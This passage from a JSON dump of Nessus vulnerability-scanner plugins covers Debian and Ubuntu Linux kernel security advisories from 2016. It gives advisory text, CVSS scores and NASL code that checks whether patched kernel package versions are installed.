channel that can be used to find TCP\n connections between specific IP addresses, and to inject\n messages into those connections.\n\n Where a service is made available through TCP, this may allow remote\n attackers to impersonate another connected user to the server or to\n impersonate the server to another connected user. In case the\n service uses a protocol with message authentication (e.g. TLS or\n SSH), this vulnerability only allows denial of service (connection\n failure). An attack takes tens of seconds, so short-lived TCP\n connections are also unlikely to be vulnerable.\n\n This may be mitigated by increasing the rate limit for TCP Challenge\n ACKs so that it is never exceeded: sysctl\n net.ipv4.tcp_challenge_ack_limit=1000000000\n\n - CVE-2016-6136\n Pengfei Wang discovered that the audit subsystem has a\n 'double-fetch' or 'TOCTTOU' bug in its handling of\n special characters in the name of an executable. Where\n audit logging of execve() is enabled, this allows a\n local user to generate misleading log messages.\n\n - CVE-2016-6480\n Pengfei Wang discovered that the aacraid driver for\n Adaptec RAID controllers has a 'double-fetch' or\n 'TOCTTOU' bug in its validation of 'FIB' messages passed\n through the ioctl() system call. This has no practical\n security impact in current Debian releases.\n\n - CVE-2016-6828\n Marco Grassi reported a 'use-after-free' bug in the TCP\n implementation, which can be triggered by local users.\n The security impact is unclear, but might include denial\n of service or privilege escalation.", "edition": 26, "cvss3": {"score": 5.5, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-06T00:00:00", "title": "Debian DSA-3659-1 : linux - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-5696", "CVE-2016-6136", "CVE-2016-6828"], "modified": "2016-09-06T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:linux"], "id": "DEBIAN_DSA-3659.NASL", "href": "https://www.tenable.com/plugins/nessus/93324", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3659. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93324);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-5696\", \"CVE-2016-6136\", \"CVE-2016-6480\", \"CVE-2016-6828\");\n script_xref(name:\"DSA\", value:\"3659\");\n\n script_name(english:\"Debian DSA-3659-1 : linux - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or have other\nimpacts.\n\n - CVE-2016-5696\n Yue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and\n Srikanth V. Krishnamurthy of the University of\n California, Riverside; and Lisa M. Marvel of the United\n States Army Research Laboratory discovered that Linux's\n implementation of the TCP Challenge ACK feature results\n in a side channel that can be used to find TCP\n connections between specific IP addresses, and to inject\n messages into those connections.\n\n Where a service is made available through TCP, this may allow remote\n attackers to impersonate another connected user to the server or to\n impersonate the server to another connected user. In case the\n service uses a protocol with message authentication (e.g. TLS or\n SSH), this vulnerability only allows denial of service (connection\n failure). An attack takes tens of seconds, so short-lived TCP\n connections are also unlikely to be vulnerable.\n\n This may be mitigated by increasing the rate limit for TCP Challenge\n ACKs so that it is never exceeded: sysctl\n net.ipv4.tcp_challenge_ack_limit=1000000000\n\n - CVE-2016-6136\n Pengfei Wang discovered that the audit subsystem has a\n 'double-fetch' or 'TOCTTOU' bug in its handling of\n special characters in the name of an executable. Where\n audit logging of execve() is enabled, this allows a\n local user to generate misleading log messages.\n\n - CVE-2016-6480\n Pengfei Wang discovered that the aacraid driver for\n Adaptec RAID controllers has a 'double-fetch' or\n 'TOCTTOU' bug in its validation of 'FIB' messages passed\n through the ioctl() system call. This has no practical\n security impact in current Debian releases.\n\n - CVE-2016-6828\n Marco Grassi reported a 'use-after-free' bug in the TCP\n implementation, which can be triggered by local users.\n The security impact is unclear, but might include denial\n of service or privilege escalation.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5696\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-6136\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-6480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-6828\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/linux\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3659\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the linux packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 3.16.36-1+deb8u1. In addition, this update contains several\nchanges originally targeted for the upcoming jessie point release.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.8-arm\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.8-x86\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.9-x86\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-doc-3.16\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-586\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-686-pae\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-amd64\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-armel\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-armhf\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-i386\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-amd64\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-armmp\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-armmp-lpae\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-common\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-ixp4xx\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-kirkwood\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-orion5x\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-versatile\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-586\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-686-pae\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-686-pae-dbg\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-amd64\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-amd64-dbg\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-armmp\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-armmp-lpae\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-ixp4xx\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-kirkwood\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-orion5x\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-versatile\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-libc-dev\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-manual-3.16\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-source-3.16\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-support-3.16.0-9\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xen-linux-system-3.16.0-9-amd64\", reference:\"3.16.36-1+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-03-01T07:31:25", "description": "Marco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the\nLinux kernel. A local attacker could use this to corrupt audit logs or\ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 35, "cvss3": {"score": 5.5, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-10-11T00:00:00", "title": "Ubuntu 12.04 LTS : linux vulnerabilities (USN-3097-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-3097-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93953", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3097-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93953);\n script_version(\"2.14\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-6136\", \"CVE-2016-6480\", \"CVE-2016-6828\");\n script_xref(name:\"USN\", value:\"3097-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux vulnerabilities (USN-3097-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Marco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the\nLinux kernel. A local attacker could use this to corrupt audit logs or\ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3097-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-6136\", \"CVE-2016-6480\", \"CVE-2016-6828\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3097-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-111-generic\", pkgver:\"3.2.0-111.153\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-111-generic-pae\", pkgver:\"3.2.0-111.153\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-111-highbank\", pkgver:\"3.2.0-111.153\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-111-virtual\", pkgver:\"3.2.0-111.153\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.2-generic / linux-image-3.2-generic-pae / etc\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-03-01T07:31:25", "description": "Vladimir Benes discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the\nLinux kernel. A local attacker could use this to corrupt audit logs or\ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 36, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-10-11T00:00:00", "title": "Ubuntu 14.04 LTS : linux vulnerabilities (USN-3098-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828", "CVE-2016-7039"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3098-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93954", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3098-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93954);\n script_version(\"2.14\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-6136\", \"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7039\");\n script_xref(name:\"USN\", value:\"3098-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux vulnerabilities (USN-3098-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vladimir Benes discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the\nLinux kernel. A local attacker could use this to corrupt audit logs or\ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3098-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.13-generic,\nlinux-image-3.13-generic-lpae and / or linux-image-3.13-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-6136\", \"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7039\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3098-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-98-generic\", pkgver:\"3.13.0-98.145\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-98-generic-lpae\", pkgver:\"3.13.0-98.145\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-98-lowlatency\", pkgver:\"3.13.0-98.145\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-03-01T07:31:25", "description": "USN-3098-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu\n12.04 LTS.\n\nMarco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nVladimir Benes discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nPengfei Wang discovered a race condition in the audit subsystem in the\nLinux kernel. A local attacker could use this to corrupt audit logs or\ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 36, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-10-11T00:00:00", "title": "Ubuntu 12.04 LTS : linux-lts-trusty vulnerabilities (USN-3098-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828", "CVE-2016-7039"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", 